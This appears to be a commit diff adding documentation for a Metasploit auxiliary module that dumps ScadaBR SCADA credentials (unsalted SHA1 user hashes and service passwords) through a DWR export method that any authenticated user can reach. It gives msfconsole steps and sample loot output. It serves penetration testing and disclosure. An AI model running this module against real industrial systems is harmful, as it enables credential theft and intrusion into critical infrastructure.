|
| 1 | +## Description |
| 2 | + |
| 3 | + This module retrieves credentials from ScadaBR, including service credentials and unsalted SHA1 password hashes for all users, by invoking the `EmportDwr.createExportData` DWR method of Mango M2M which is exposed to all authenticated users regardless of privilege level. |
| 4 | + |
| 5 | + |
| 6 | +## Vulnerable Application |
| 7 | + |
| 8 | + ScadaBR is a SCADA (Supervisory Control and Data Acquisition) system with applications in Process Control and Automation, being developed and distributed using the open source model. |
| 9 | + |
| 10 | + This module has been tested successfully with ScadaBR versions 1.0 CE and 0.9 on Windows and Ubuntu systems. |
| 11 | + |
| 12 | + Installers: |
| 13 | + |
| 14 | + * [Windows Installers](https://sourceforge.net/projects/scadabr/files/Software/Installer%20Win32/) |
| 15 | + * [Linux Installers](https://sourceforge.net/projects/scadabr/files/Software/Linux/) |
| 16 | + * [Tomcat WAR files](https://sourceforge.net/projects/scadabr/files/Software/WAR/) |
| 17 | + |
| 18 | + |
| 19 | +## Verification Steps |
| 20 | + |
| 21 | + 1. Start `msfconsole` |
| 22 | + 2. Do: `use auxiliary/admin/http/scadabr_credential_dump` |
| 23 | + 3. Do: `set rhost [IP]` |
| 24 | + 4. Do: `set username [USERNAME]` |
| 25 | + 5. Do: `set password [PASSWORD]` |
| 26 | + 6. Do: `run` |
| 27 | + 7. You should get credentials |
| 28 | + |
| 29 | + |
| 30 | +## Sample Output |
| 31 | + |
| 32 | + ``` |
| 33 | + [+] 172.16.191.166:8080 Authenticated successfully as 'admin' |
| 34 | + [+] 172.16.191.166:8080 Export successful (4436 bytes) |
| 35 | + [+] Found 5 users |
| 36 | + [*] Found weak credentials (admin:admin) |
| 37 | + [*] Found weak credentials (user:password) |
| 38 | + [*] Found weak credentials (zxcv:zxcv) |
| 39 | +
|
| 40 | + ScadaBR User Credentials |
| 41 | + ======================== |
| 42 | +
|
| 43 | + Username Password Hash (SHA1) Admin E-mail |
| 44 | + -------- -------- ----------- ----- ------ |
| 45 | + admin admin d033e22ae348aeb5660fc2140aec35850c4da997 true [email protected] |
| 46 | + operator ef0cade28a5696433326749bb57c39104ca33550 false operator@localhost |
| 47 | + test 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 false test@localhost |
| 48 | + user password 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 true user@localhost |
| 49 | + zxcv zxcv 9878e362285eb314cfdbaa8ee8c300c285856810 false zxcv@localhost |
| 50 | +
|
| 51 | +
|
| 52 | + ScadaBR Service Credentials |
| 53 | + =========================== |
| 54 | +
|
| 55 | + Service Host Port Username Password |
| 56 | + ------- ---- ---- -------- -------- |
| 57 | + HTTP proxy 127.0.0.1 8080 proxytestuser proxytestpass |
| 58 | + SMTP 127.0.0.1 25 smtptestuser smtptestpass |
| 59 | +
|
| 60 | + [+] Config saved in: /root/.msf4/loot/20170527210941_default_172.16.191.166_scadabr.config_861842.txt |
| 61 | + [*] Auxiliary module execution completed |
| 62 | + ``` |
| 63 | + |
0 commit comments